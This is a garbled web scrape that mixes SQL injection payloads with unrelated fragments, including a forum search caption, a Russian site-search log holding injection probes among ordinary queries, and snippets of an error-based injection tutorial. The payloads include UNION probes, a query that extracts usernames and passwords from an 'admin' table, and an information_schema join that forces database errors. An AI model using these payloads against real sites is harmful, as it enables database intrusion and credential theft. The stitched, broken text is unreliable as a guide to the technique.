+and+(select+count(*)+from+(select+1+union+select+null+union+select+!1).
-999.9+union+all+select+%27R3DM0V3_hvj_injection',null%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL
Search this forum only. Display results as threads.
0x39313335313435363237322e39 is just the hex text of 91351456272.9.
cast bar48 sec ago.
На сайте искали: zs070be3007b3h6tt | 999999.9'+unio n+all+sel ect+0x393133353134353632312e39,0x393133353134353632322e39+and+'0'='0 | мешок | +bocoin+q670 | %ef%f0%e5%f1%f2%e8%e6%e8%ee+5300 | apple%206 | ����.
You can clearly see rules containing keywords "select", "union", "all" etc.
-1 UNION SELECT group_concat(username, 0x3a, password) FROM admin.
+and+(select+*+from+(select+*+from+information_schema.tables+as+x+join+information_schema.tables+y+using+(TABLE_CATALOG))as+z)--. Duplicate column name 'TABLE_SCHEMA'. That's it for now, I'll try and update this when I learn more methods of error based injection.
...all select id =null union all select id =1 +and+ false + union +all +select id = 9999 union all select +.